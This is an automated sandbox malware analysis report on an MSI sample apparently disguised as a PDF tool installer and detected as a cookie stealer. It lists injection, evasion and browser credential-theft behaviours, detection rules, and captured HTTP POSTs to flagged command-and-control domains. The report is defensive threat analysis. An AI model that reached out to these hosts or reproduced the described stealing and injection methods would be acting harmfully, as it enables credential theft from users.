Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6rfyiAq0nM

Overview

General Information

Sample Name:6rfyiAq0nM (renamed file extension from none to msi)
Analysis ID:508222
MD5:623673851fbb205eb0d1003cb892d4d6
SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
Tags:msi
Infos:

Most interesting Screenshot:

Detection

Cookie Stealer
Score:74
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Cookie Stealer
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Allocates memory in foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Contains functionality to steal Chrome passwords or cookies
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to enumerate running services
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6980 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • MSIFBC3.tmp (PID: 4928 cmdline: C:\Windows\Installer\MSIFBC3.tmp MD5: B6D7559D31D4FF2D02338DF9CEF2FBD8)
      • MSIFBC3.tmp (PID: 6292 cmdline: 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp' MD5: D73DDB8F6B777CC6411FD3CA254F3DEC)
        • rundll32.exe (PID: 5336 cmdline: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • svchost.exe (PID: 2968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • svchost.exe (PID: 6944 cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 996 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 256 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2320 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1124 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2468 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 664 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2948 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1452 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1868 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 3444 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 5104 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\ilovepdf\is-93C0J.tmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0xed44a:$s1: \xAE\xB2\xB2\xB6\xFC\xE9\xE9

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6646e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Click to see the 65 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
27.2.svchost.exe.2743a320000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
34.2.svchost.exe.202b28f0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
20.2.svchost.exe.1d91aad0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
24.2.svchost.exe.1dc51fb0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
37.2.svchost.exe.1afba170000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Click to see the 69 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Svchost ProcessShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5336, ProcessCommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 2968

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 6rfyiAq0nM.msiVirustotal: Detection: 31%Perma Link
Source: 6rfyiAq0nM.msiReversingLabs: Detection: 35%
Multi AV Scanner detection for domain / URLShow sources
Source: https://fg.mygameagend.com/report7.4.phpVirustotal: Detection: 5%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpReversingLabs: Detection: 25%
Source: 13.2.rundll32.exe.4eb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 37.2.svchost.exe.1afba170000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 20.2.svchost.exe.1d91aad0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 28.0.svchost.exe.1111ac00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 24.0.svchost.exe.1dc51fb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 28.2.svchost.exe.1111ac00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 24.2.svchost.exe.1dc51fb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 37.0.svchost.exe.1afba170000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 30.2.svchost.exe.1be5cd40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 17.0.svchost.exe.204f3380000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 27.2.svchost.exe.2743a320000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 34.2.svchost.exe.202b28f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 16.2.svchost.exe.12e17870000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 34.0.svchost.exe.202b28f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 19.2.svchost.exe.233426d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 23.2.svchost.exe.28621cd0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 29.0.svchost.exe.22f12740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 29.2.svchost.exe.22f12740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 31.2.svchost.exe.21c23140000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 23.0.svchost.exe.28621cd0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 27.0.svchost.exe.2743a320000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 31.0.svchost.exe.21c23140000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 17.2.svchost.exe.204f3380000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 21.0.svchost.exe.2f2c5c00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 38.0.svchost.exe.25c96c80000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 25.2.svchost.exe.2216b8b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 30.0.svchost.exe.1be5cd40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 22.0.svchost.exe.222cab20000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 22.2.svchost.exe.222cab20000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 14.2.svchost.exe.24b7d0d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 19.0.svchost.exe.233426d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 21.2.svchost.exe.2f2c5c00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 38.2.svchost.exe.25c96c80000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 25.0.svchost.exe.2216b8b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 14.0.svchost.exe.24b7d0d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 20.0.svchost.exe.1d91aad0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198245C0 _fread_nolock,new,ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,16_2_0000012E198245C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19821320 ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,16_2_0000012E19821320
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,13_2_04EC4560
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040AEF4 FindFirstFileW,FindClose,10_2_0040AEF4
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,10_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,11_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0060BC10 FindFirstFileW,GetLastError,11_2_0060BC10
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,11_2_006B76A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,13_2_04EB4C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB56D0 FindFirstFileW,FindClose,13_2_04EB56D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_04EB4E30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,13_2_04EB57F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE97D9 FindFirstFileExA,13_2_04EE97D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,13_2_04EB42B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,13_2_04EB6A30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,13_2_04EB53D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,13_2_04EC7390
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,14_2_0000024B7D0D5E30
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,14_2_0000024B7D0EAE60
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_0000024B7D0D57B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D49FF
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,14_2_0000024B7D0D7A20
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,14_2_0000024B7D0D4AE3
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,14_2_0000024B7D0D63F0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D110478 FindFirstFileExA,14_2_0000024B7D110478
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D4B90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,16_2_0000012E17874AE3
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,16_2_0000012E178749FF
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,16_2_0000012E17877A20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_0000012E178757B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E17875E30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,16_2_0000012E1788AE60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B0478 FindFirstFileExA,16_2_0000012E178B0478
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,16_2_0000012E178763F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,16_2_0000012E17874B90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805CF4 FindFirstFileExA,16_2_0000012E19805CF4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E19823D90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,16_2_0000012E198EB2F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,17_2_00000204F3384B90
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,17_2_00000204F33863F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C0478 FindFirstFileExA,17_2_00000204F33C0478
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,17_2_00000204F3384AE3
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,17_2_00000204F33849FF
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,17_2_00000204F3387A20
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00000204F33857B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,17_2_00000204F3385E30
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,17_2_00000204F339AE60

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.3:60785 -> 34.64.183.91:53
Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.3:53947 -> 34.64.183.91:53
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\svchost.exeDomain query: toa.mygametoa.com
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: fg.mygameagend.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
